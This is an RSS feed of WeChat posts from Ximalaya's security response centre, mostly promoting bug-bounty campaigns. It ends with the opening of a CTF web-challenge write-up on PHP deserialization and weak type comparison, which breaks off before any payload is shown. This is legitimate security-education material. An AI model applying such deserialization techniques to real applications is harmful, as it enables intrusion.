top;background-color: rgb(221, 231, 248);padding: 3px;box-sizing: border-box;" powered-by="xiumi.us"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;font-size: 16px;color: rgb(106, 106, 106);line-height: 1.2;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">03</strong></p></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;padding-right: 10px;padding-left: 10px;flex: 100 100 0%;align-self: center;border-width: 0px;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;background-color: rgba(255, 255, 255, 0);box-sizing: border-box;"><section style="margin-top: 5px;margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="color: rgb(62, 62, 62);box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 16px;"><strong style="box-sizing: border-box;">活动规则</strong></span></p></section></section></section></section></section></section></section><section style="margin-right: 0%;margin-bottom: 20px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="color: rgb(62, 62, 62);box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">1.  有效高危及以上漏洞可得<strong style="box-sizing: border-box;"><span style="color: rgb(95, 156, 239);box-sizing: border-box;">3倍奖励</span></strong></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">2.  有效中低危漏洞<span style="color: rgb(95, 156, 239);box-sizing: border-box;"><strong style="box-sizing: border-box;">2倍奖励</strong></span></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">3.  <strong style="box-sizing: border-box;"><span style="font-size: 15px;color: rgb(95, 156, 239);box-sizing: border-box;">前五名(贡献值&gt; =10)</span></strong>额外赠送<span style="font-size: 15px;color: rgb(95, 156, 239);box-sizing: border-box;"><strong style="box-sizing: border-box;">喜马拉雅年货礼盒</strong></span></span></p></section></section></section></section><section style="margin: 10px 0% 30px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-width: 0px 0px 0px 4px;border-radius: 0px 10px 10px 0px;border-style: none none none solid;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(62, 62, 62) rgb(95, 156, 239);background-color: rgb(247, 250, 255);padding: 15px 20px;box-sizing: border-box;"><section style="color: rgb(142, 142, 142);line-height: 1.8;box-sizing: border-box;" powered-by="xiumi.us"><p style="white-space: normal;box-sizing: border-box;"><span style="color: rgb(62, 62, 62);box-sizing: border-box;font-size: 15px;"><strong style="box-sizing: border-box;">附：</strong></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="color: rgb(62, 62, 62);box-sizing: border-box;font-size: 15px;">1. SRC行业安全测试规范</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="color: rgb(62, 62, 62);box-sizing: border-box;font-size: 15px;"><a href="https://security.ximalaya.com/announcement/msg/46" target="_blank">https://security.ximalaya.com/announcement/msg/46</a></span></p><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p><p style="white-space: normal;box-sizing: border-box;"><span style="color: rgb(62, 62, 62);box-sizing: border-box;font-size: 15px;">2. 喜马拉雅SRC漏洞处理规则及评分标准v2.1</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="color: rgb(62, 62, 62);box-sizing: border-box;font-size: 15px;"><a href="https://security.ximalaya.com/announcement/msg/54" target="_blank">https://security.ximalaya.com/announcement/msg/54</a></span></p></section></section></section><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: solid;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239);padding-top: 10px;padding-right: 10px;padding-bottom: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;box-sizing: border-box;"><section style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;height: auto;border-style: solid solid solid none;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239) rgb(95, 156, 239) rgb(95, 156, 239) rgb(0, 175, 236);padding-right: 4px;padding-bottom: 4px;background-color: rgb(200, 232, 245);box-shadow: rgb(255, 255, 255) -4px -4px 0px inset;line-height: 0.1;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;line-height: 0.1;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-width: 0px;box-sizing: border-box;"><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;height: 4px;vertical-align: top;overflow: hidden;box-shadow: rgb(0, 0, 0) 0px 0px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section><section style="display: inline-block;width: 100%;vertical-align: top;padding: 8px;border-width: 0px;background-color: rgb(95, 156, 239);box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img data-ratio="1" style="vertical-align: middle;box-sizing: border-box;" data-type="jpeg" data-w="430" src="https://wechat2rss.xlab.app/img-proxy/?k=9c935dfe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibibRvIkR8VrCGWVlX7UFAu6QzicjQNLYclpqRF1eIFR0tFswUtSXtbFYKp8LicjKNU2NQIzdiaGyw6dOw%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: top;width: auto;padding-left: 10px;flex: 50 50 0%;align-self: stretch;border-width: 0px;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="text-align: left;color: rgb(95, 156, 239);font-size: 16px;letter-spacing: 2px;box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">喜马拉雅安全响应平台</strong></p></section><section style="margin-top: 20px;margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 12px;color: rgb(106, 106, 106);line-height: 1.6;padding-right: 3px;padding-left: 3px;box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;">扫码关注我们</p></section></section></section></section></section></section></section><section style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: left;margin: -100px 0% 10px;justify-content: flex-start;transform: rotateX(180deg) rotateY(180deg);-webkit-transform: rotateX(180deg) rotateY(180deg);-moz-transform: rotateX(180deg) rotateY(180deg);-o-transform: rotateX(180deg) rotateY(180deg);box-sizing: border-box;"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 45%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><img data-ratio="0.5172413793103449" style="vertical-align: middle;width: 100%;height: 100%;box-sizing: border-box;" data-type="svg" data-w="290" src="https://wechat2rss.xlab.app/img-proxy/?k=fa9c9602&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2FOibRNdtlJdkEicv76OPbMfOGZlyCSXD2NR7iawiaFp7EauKzl6myBKKRU50qw0dM7k6ic6IzZUXwzVSB27JfUDsZ5ng63DVT9zH2R%2F640%3Fwx_fmt%3Dsvg"/></section></section></section></section><p><br/></p>



<p><a href="https://security.ximalaya.com/announcement/msg/58">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=199f4e2b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483723%26idx%3D1%26sn%3D289b6eac8384cc2921541e5c0e6ba082%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 20 Jan 2021 10:49:00 +0800</pubDate>
    </item>
    <item>
      <title>喜马拉雅SRC秋季活动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483713&amp;idx=1&amp;sn=5d4079be4c08ab85f07fc654b9e40c6c</link>
      <description></description>
      <content:encoded><![CDATA[<p>
<span>dux</span> <span>2020-09-11 13:50</span> <span style="display: inline-block;"></span>
</p>

<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=e8aeb30e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibicuhlibCUYwNdrkhsmCbHAlESWibrw2fiaO9Dz2S9Jh3ZtHRhiaXqSXTqCDN9S9jG72uaHI1xCKK5NTYg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages" data-ratio="3.125" data-s="300,640" style="" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=9cad0438&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicuhlibCUYwNdrkhsmCbHAlEWT4oRzsAjDZEn2vEhLoYxJ80UHxS9a8xjRCm1eibavfR3vW8C0iaIIuw%2F640%3Fwx_fmt%3Dpng"/></p><p>附：</p><p><span style="color: rgb(17, 31, 44);font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;font-size: 14px;text-align: left;white-space: pre-wrap;background-color: rgb(201, 231, 255);">喜马拉雅安全应急响应中心</span><br style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);box-sizing: border-box;background-clip: padding-box;color: rgb(17, 31, 44);font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;font-size: 14px;text-align: left;white-space: pre-wrap;background-color: rgb(201, 231, 255);"/><a href="https://security.ximalaya.com/" target="_blank">https://security.ximalaya.com/</a><br style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);box-sizing: border-box;background-clip: padding-box;color: rgb(17, 31, 44);font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;font-size: 14px;text-align: left;white-space: pre-wrap;background-color: rgb(201, 231, 255);"/><span style="color: rgb(17, 31, 44);font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;font-size: 14px;text-align: left;white-space: pre-wrap;background-color: rgb(201, 231, 255);">SRC行业安全测试规范</span><br style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);box-sizing: border-box;background-clip: padding-box;color: rgb(17, 31, 44);font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;font-size: 14px;text-align: left;white-space: pre-wrap;background-color: rgb(201, 231, 255);"/><a href="https://security.ximalaya.com/announcement/msg/46" target="_blank">https://security.ximalaya.com/announcement/msg/46</a></p>



<p><a href="https://security.ximalaya.com/announcement/msg/51">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bc414416&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483713%26idx%3D1%26sn%3D5d4079be4c08ab85f07fc654b9e40c6c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 11 Sep 2020 13:50:00 +0800</pubDate>
    </item>
    <item>
      <title>喜马拉雅SRC入驻火线平台啦～</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483708&amp;idx=1&amp;sn=3a8b22b0f1bb4f36fb74d4fe3235c814</link>
      <description></description>
      <content:encoded><![CDATA[<p>
<span>dux</span> <span>2020-07-31 09:41</span> <span style="display: inline-block;"></span>
</p>

<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=9a33f834&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib8wXvtwo4yc5ydmIChYsMibcyJicIdoRibEQZZFMzdV6BZ5lK4UFiaxxnre3LsIplTPTFCZ8wT9dlVMyg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><img data-w="1080" data-type="jpeg" data-ratio="3.2203703703703703" src="https://wechat2rss.xlab.app/img-proxy/?k=1c6585a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F0Z0LqMyVGaTul7zw9E2uoicUmbLWDdpZfDlriaiaqpicom9BfmH8VuqlpzEt6DFCOgFqpak1VfEoqawN0yUAwKeI6w%2F640%3Fwx_fmt%3Djpeg"/></p><p style="max-width: 100%;min-height: 1em;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;font-family: Calibri;font-size: 14px;color: rgb(0, 0, 0);text-indent: 32px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-family: 宋体;font-size: 19px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">文末福利来啦👇</span></span></p><p style="max-width: 100%;min-height: 1em;font-family: -apple-system-font, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-family: 宋体;font-size: 19px;box-sizing: border-box !important;overflow-wrap: break-word !important;"></span><br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;font-family: -apple-system-font, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-family: 宋体;font-size: 19px;box-sizing: border-box !important;overflow-wrap: break-word !important;"></span></p><p style="max-width: 100%;min-height: 1em;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;font-family: Calibri;font-size: 14px;color: rgb(0, 0, 0);text-indent: 32px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-family: 宋体;font-size: 19px;box-sizing: border-box !important;overflow-wrap: break-word !important;">关注【火大表姐】和【喜马拉雅安全响应平台】，并且转发文章到朋友圈，即可参与抽奖～</span></p><p><mp-miniprogram data-miniprogram-appid="wx01bb1ef166cd3f4e" data-miniprogram-path="pages/lucky/lottery/detail?id=7YvvwBDse8B" data-miniprogram-nickname="抽奖助手" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/Vdys2e8jP1l1clbflznHYO7IRflCZWjPfD4NMn1Xqgr5gZbBy1qVc12cGVG1whLTXiafBT7kiaWRl38HCbqLnRzw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="喜马拉雅入驻火线平台喊你来抽奖！~" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/bNibSwNU98ib8wXvtwo4yc5ydmIChYsMibckN0QKKibWQIB5ZgdWuKRM3HXdzibtleuQNsXjk4gEdjYP8wjFKwFE2nQ/0?wx_fmt=jpeg" data-miniprogram-type="card" data-miniprogram-servicetype="0"></mp-miniprogram></p><p data-key="5edde352167861d32a95f8fa" style="white-space: normal;text-align: center;">[喜马拉雅安全应急响应中心]（<span style="text-decoration: underline;color: rgb(0, 213, 255);"><a href="https://security.ximalaya.com/" target="_blank">https://security.ximalaya.com/</a></span><span data-key="6f560270-aabd-11ea-b0a7-9591f31073a3-121">）</span><br/></p><p data-key="5edde352167861d32a95f8fa" style="white-space: normal;text-align: center;"><br/></p><p style="white-space: normal;text-align: center;"><span style="top: -94px;"></span></p><p data-key="5edef84e167861ce15960292" style="white-space: normal;text-align: center;">[漏洞评分标准]（<span style="text-decoration: underline;color: rgb(0, 213, 255);"><a href="https://security.ximalaya.com/announcement/msg/47" target="_blank">https://security.ximalaya.com/announcement/msg/47</a></span><span data-key="6f560270-aabd-11ea-b0a7-9591f31073a3-125">）</span></p>



<p><a href="2247483708">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c1f92ab1&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483708%26idx%3D1%26sn%3D3a8b22b0f1bb4f36fb74d4fe3235c814%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 31 Jul 2020 09:41:00 +0800</pubDate>
    </item>
    <item>
      <title>[端午活动]挖洞三倍奖励请查收</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483693&amp;idx=1&amp;sn=38865af12e5049cc2d7c850063d37364</link>
      <description>[端午活动]挖洞三倍奖励请查收</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2020-06-10 10:04</span> <span style="display: inline-block;"></span>
</p>

<p>[端午活动]挖洞三倍奖励请查收</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=d17f1b8b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9uZzXH0WZbAibEicdfGcJpussibyWibp0xO76f8NBZnORhSuuTp8FyMhCCcUEXfHtictE1XibxMytnNyMw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="3.75" data-s="300,640" style="" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=09d5170d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib9uZzXH0WZbAibEicdfGcJpustrTbJoAlWUtzicAaUNEfEQwibDDibapKbQo4yc110HvS9wjoibrUpg0dTg%2F640%3Fwx_fmt%3Dpng"/></p><hr style="border-style: solid;border-width: 1px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);"/><p style="text-align: center;"><br/></p><p data-key="5edde352167861d32a95f8fa" style="text-align: center;">[喜马拉雅安全应急响应中心]（<span style="text-decoration: underline;color: rgb(0, 213, 255);"><a href="https://security.ximalaya.com/" target="_blank">https://security.ximalaya.com/</a></span><span data-key="6f560270-aabd-11ea-b0a7-9591f31073a3-121">）</span></p><p data-key="5edde352167861d32a95f8fa" style="text-align: center;"><span data-key="6f560270-aabd-11ea-b0a7-9591f31073a3-121"><br/></span></p><p style="text-align: center;"><span style="top: -94px;"></span></p><p data-key="5edef84e167861ce15960292" style="text-align: center;">[漏洞评分标准]（<span style="text-decoration: underline;color: rgb(0, 213, 255);"><a href="https://security.ximalaya.com/announcement/msg/47" target="_blank">https://security.ximalaya.com/announcement/msg/47</a></span><span data-key="6f560270-aabd-11ea-b0a7-9591f31073a3-125">）</span></p>



<p><a href="https://security.ximalaya.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7f41f88c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483693%26idx%3D1%26sn%3D38865af12e5049cc2d7c850063d37364%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 10 Jun 2020 10:04:00 +0800</pubDate>
    </item>
    <item>
      <title>网鼎杯Web题全解析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483687&amp;idx=1&amp;sn=7982d28f49700ddb9247fafa28547089</link>
      <description>用一天时间写完的网鼎杯四组Web题的总结，如有差错还请师傅们斧正</description>
      <content:encoded><![CDATA[<p>
原创 <span>hosch3n</span> <span>2020-05-26 17:39</span> <span style="display: inline-block;"></span>
</p>

<p>用一天时间写完的网鼎杯四组Web题的总结，如有差错还请师傅们斧正</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=59f9455a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGAXeBYLIKVQLsicz5icUELXUMWeF1WZzVHJb6HSzt9oZacmGvFDgSC6icQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.22890625" data-s="300,640" style="text-align: center;white-space: normal;" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=1ffb7b21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG9uhEibicWILgO3KON8YRUFr8MbXK3NhZoAyNiccA5TQN8XdZrlvjsvN7A%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><br/></span></p><p style="text-align: justify;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">首先感谢国家网信相关单位及i春秋等公司对大赛的大力</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">支持，喜马拉雅作为玄武组的一份子积极参加</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">了比赛，并在赛后回顾和复现了赛题中出现的相关技术。<span style="text-align: center;">作者目前也是正在边练边学的小朋友，如有差错还请师傅们交流斧正。</span></span></p><p style="text-align: justify;"><br/></p><p style="text-align: justify;"><span style="font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;text-align: left;white-space: pre-wrap;font-size: 18px;color: rgb(61, 170, 214);">同时希望大家能多多关注本公众号，近期还会继续发布SRC的福利活动和优质的技术文章。</span></p><p style="text-align: justify;"><span style="font-family: -apple-system, system-ui, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Segoe UI&#34;, system-ui, Roboto, &#34;Droid Sans&#34;, &#34;Helvetica Neue&#34;, sans-serif;text-align: left;white-space: pre-wrap;font-size: 18px;color: rgb(61, 170, 214);"><br/></span></p><p style="text-align: justify;">被微信公众号吃掉了的脚本链接，均可通过 <strong>阅读原文</strong> 或如下网址找到找到</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//github.com/hosch3n/expload</span></span></code></pre></section><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">AreUSerialz<br/></h2><p>考察PHP反序列化、PHP弱类型比较<span style="text-align: center;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"></span></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">index.php 接收GET方法<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">str</code>参数的值，并将值传入<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">is_valid</code>函数，如果不包含不可见特殊字符，则对其进行反序列化</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.5603864734299517" data-s="300,640" style="" data-type="png" data-w="621" src="https://wechat2rss.xlab.app/img-proxy/?k=ff6b6dd6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGVIpibg7QwOKJrcaqlXNY4VwLHyqjy0gNaWZOIHfZMfDUQwNNiaXRVOwA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">FileHandler</code>类的三个<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">protected</code>属性分别为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">op</code>、<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">filename</code>、<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">content</code>，构造函数对三个属性进行初始化赋值后调用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">process</code>方法<span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="1.033596837944664" data-s="300,640" style="" data-type="png" data-w="506" 